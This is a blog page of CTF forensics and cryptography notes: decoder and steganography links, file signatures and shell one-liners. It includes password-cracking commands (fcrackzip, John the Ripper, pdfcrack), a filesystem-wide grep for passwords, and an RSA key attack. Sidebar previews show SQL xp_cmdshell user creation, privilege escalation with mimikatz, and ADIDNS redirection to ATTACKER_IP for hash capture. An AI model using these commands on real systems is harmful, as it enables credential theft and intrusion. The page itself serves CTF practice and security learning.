Skip to main content

Forensics & Crypto

By
Online Decoder --> https://2cyr.com/decode/
Encoding errors --> https://ftfy.now.sh/
File Signatures List --> Click here
PCAP Analysis: --> https://www.packettotal.com/

Online Cipher Decryptors:

CyberChef  - Cipher Decoder  Crack Station-Hash Cracker Decrypt Any Kind of Hash

1) Cipher Statistics
2) Index of Coincidence Calculator - Online IC Cryptanalysis Tool
3) Tools List (Awesome and Fantastic Tools) Available on dCode
4) Solve an Aristocrat or Patristocrat
5) RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
5-1) RSA - Find PQ using N
6) BertNase's Own Hide content in a Image made of blocks - npiet fun!
7) Vigenere Solver - www.guballa.de
8) Fernet (Decode)
9) Unicode Text Steganography Encoders/Decoders
10) All in ONE encoders and Decoders Tool
11) Cryptii - Decoder

Image Forensics:

1) Forensically, free online photo forensics tools - 29a.ch
2) StegSolve to decryt data in image files

Online Stegnographic tools

1) https://osric.com/chris/steganography/decode.html
2) http://stylesuxx.github.io/steganography/
3) https://futureboy.us/stegano/decinput.html
4) https://www.pdf-online.com/osa/extract.aspx --> For PDF


Audio Forensics:

1) Decrypt Old tapes with software for Atari 8-bit computers (Software - Download Required)
strings filename | awk 'length($0)>15' | sort -u
                                     /\
                      Setting the minimum length
                      for a string can help clean
                      out a lot of the garbage.
                      this will only print strings
                      with 15 or more chars.
# strings -a -n 15 filename
grep -rnw '/' -ie 'password' --color=always  

    --> Print files with line numbers where string is found
# Grep for words starting with "co"

egrep "^co" common.txt > /cp.txt
#Hex Decode a file 

cat key| xxd -r -p  > key.bin 
fcrackzip -D -p rockyou.txt -u   --> crack a zip file using        wordlist


Download John the Ripper Community Version (Lot of Plugins are Available)

zip2john filename.zip > filehash.txt    --> creates a hash

john filehash.txt -> cracks the password using default wordlist 

john -wordlist=/usr/share/wordlists/rockyou.txt.gz filehash.txt 













pdfcrack -f file.pdf -w ../stego/rockyou.txt  --> crack PDF Files using wordlist 
Analyzing Event logs for finding violations 

sudo usbrip events violations auth.json -f syslog  
python latex.py --files file.7z --wordlist rockyou.txt

Brute Force 7z Zip files -- 7z Zip Brute Force Github


String -a 'filename.png'  --> scans the whole file instead of the data section.
binwalk -e 'filename.png' --> Automatically extracts all files. For this specific file this did not do us any good.
steghide info filename.png  --> check the embedded data inside an image; you need a passkey to get the embedded data information
steghide extract -sf filename.png --> extract the embedded data;you need a passkey to get the embedded data extracted into a file
xxd filename    --> Hex viewer 

xxd -p -c 10000 FILENAME --> Dump all the data in a single lin
xxd -p -r hex.txt > meow --> reversing a file into binary; then file meow                --> know the file details 
python RsaCtfTool.py -n 2227212908056272288661402263220544270835000977233668976511 -e 3 --uncipher 56274920108122478990888092521371739605513959053

Decrypy the cipher text when n,e and c are given in RSA
cat file.csv | sed -e 's/,,/, ,/g' | column -s, -t | less -#5 -N -S  

Read CSV files in linux  Properly
echo "whateverthehellTheTextIsAddSpacesToYourText" | sed 's/\(.\{5\}\)/\1 /g'

Add a Space after every 5 Characters
#stegnography deccrypter    
gem install zsteg

Imaging and Recovery:



sudo dcfldd if=/dev/sdb of=/home/recovery.dd
             if=input location; of=output location



scp user@10.10.10.48:/home/recovery.dd /location/filename.dd
      similar to ssh; used to copy the file into our location

xxd filename 
               open with hex editor to view the contents.

pngcheck -v filename.png --> PNGs can contain a variety of data ‘chunks’ that are optional (non-critical) as far as rendering is concerned.
exiftool filename.png --> meta data viewer; check if there are any hash values in it.
file filename.gif --> shows the actual file extension
strings ./filename  -- > find the interesting strings any file
ltrace ./filename   -->  Intercept the functions that are being called.
Unzipping a lopp of files

ZIPFILE=$1
RESULT=0
while [ $RESULT -eq 0 ]
do
PASSWORD=$( unzip -l $ZIPFILE | grep -E "^\s+[0-9]+" | grep -Eo "[0-9]+\.zip" | grep -Eo "[0-9]+" )
unzip -P "$PASSWORD" "$ZIPFILE"
RESULT=$?
echo "Unzipped $ZIPFILE using password $PASSWORD ($RESULT)"
ZIPFILE="$PASSWORD.zip"
done 
find / -size 33c -user bandit7 -group bandit6 2>/dev/null
Image Signature: 

JPG: Both images above show that a regular JPG begins with 0xFFD8 and ends with 0xFFD9
PNG: This shows that PNG images should begin with hex value 0x89504E47 and end with 0xAE426082
BMP: Bitmap images have an inconsistency in their end values from my study, but their beginning hex values are 0x424D36
GIF: Similar to bitmaps, end values for gif images vary, but they usually begin with 0x47494638


Data Recovery when you accidentally Delete a Partition

https://dmde.com/
Labels:

Comments

  1. AnonymousMarch 29, 2022 at 9:13 PM

    Forensics And Crypto >>>>> Download Now

    >>>>> Download Full

    Forensics And Crypto >>>>> Download LINK

    >>>>> Download Now

    Forensics And Crypto >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more